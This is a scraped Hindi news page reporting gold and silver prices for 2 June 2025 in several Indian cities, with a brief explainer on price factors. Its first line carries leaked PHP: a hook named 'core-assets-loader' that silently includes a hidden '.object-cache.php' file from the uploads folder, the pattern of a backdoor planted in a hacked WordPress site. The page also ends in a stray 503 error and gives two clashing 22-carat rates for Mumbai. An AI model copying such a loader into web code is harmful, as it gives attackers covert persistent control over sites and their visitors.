add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बाजार में फिर गिरा सोने का भाव, जानें आज 2 जून 2025 को आपके शहर के लेटेस्ट रेट्स – SOCH INDIA
Menu

देश
बाजार में फिर गिरा सोने का भाव, जानें आज 2 जून 2025 को आपके शहर के लेटेस्ट रेट्स

nobanner

बाजार में हाल के दिनों में सोने के दाम में लगातार गिरावट देखने को मिली है. 22 अप्रैल को सोना रिकॉर्ड 1 लाख रुपये को छूने के बाद इसका दाम तेजी के साथ गिरा है. ऐसे में आज यानी 2 जून को भी सोना खरीदारों के लिए यह एक अच्छी खबर है. 22 कैरेट सोना प्रति 10 ग्राम 89,190 रुपये की दर से सोमवार को बिक रहा है. गुड रिटर्न्स के मुताबिक, 24 कैरेट सोना 97300 रुपये प्रति दस ग्राम बिक रहा है. चांदी के दाम में भी गिरावट आयी है और ये 99,800 रुपये प्रति किलो पर आ गया है.

मुंबई में 22 कैरेट सोना कोलकाता, चेन्नई और हैदराबाद के सामान भाव पर 97,300 रुपये की दर से बिक रहा है जबकि राष्ट्रीय राजधानी दिल्ली में 24 कैरेट सोना 97,450 रुपये पर बिक रहा है.

आपके शहर में सोने के लेटेस्ट रेट्स

राष्ट्रीय राजधानी दिल्ली में 22 कैरेट सोना 89,340 रुपये जबकि 24 कैरेट सोना 97,450 रुपये पर कारोबार कर रहा है. लखनऊ में 22 कैरेट सोना 89,340 रुपये जबकि 24 कैरेट सोना 97,450 रुपये के भाव पर कारोबार कर रहा है. इसी तरह, मुंबई में 22 कैरेट सोना 89,190 रुपये प्रति 10 ग्राम तो वहीं 24 कैरेट सोना 97,300 रुपये की दर से बिक रहा है.

बेंगलुरू में 22 कैरेट सोना 89,190 रुपये जबकि 24 कैरेट सोना 97,300 रुपये की दर पर कारोबार कर रहा है. जबकि चेन्नई में 22 कैरेट सोना 89,190 रुपये तो वहीं 24 कैरेट सोना 97,300 रुपये पर बिक रहा है.

अहमदाबाद में 22 कैरेट सोना 89,240 रुपये जबकि 24 कैरेट सोना 97,350 रुपये प्रति 10 ग्राम पर बिक रहा है. जबकि कोलकाता में 22 कैरेट सोना 89,190 रुपये तो वहीं 24 कैरेट सोना 97,300 रुपये पर बिक रहा है. हैदराबाद की अगर बात करें तो यहां पर 22 कैरेट सोना 89,190 रुपये जबकि 24 कैरेट सोना प्रति 10 ग्राम 97,300 रुपये की दर से बिक रहा है.

कैसे तय होता है दाम?

सोने के दाम सिर्फ मांग और आपूर्ति के हिसाब से ही तय नहीं होता है, जैसा की हम अब तक जानते आए हैं. बल्कि इसके लिए कई फैक्टर जिम्मेदार है, जैसे- वैश्विक बाजार, लंदन का ओटीसी स्पॉट मार्केट और कॉमेक्स गोल्ड फ्यूचर्स मार्केट. इसके अलावा, डॉलर में उतार चढ़ावा, भूराजनीतिक तनाव समेत कई फैक्टर इस पर असर डालते हैं. भारत में सोना को खास स्थान है. किसी भी शादी-ब्याह या फिर पर्व त्योहार में इसका होना शुभ माना जाता है. इसके अलावा, किसी परिवार के पास सोने का होना उसकी संपन्नता का भी प्रतीक माना जाता है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.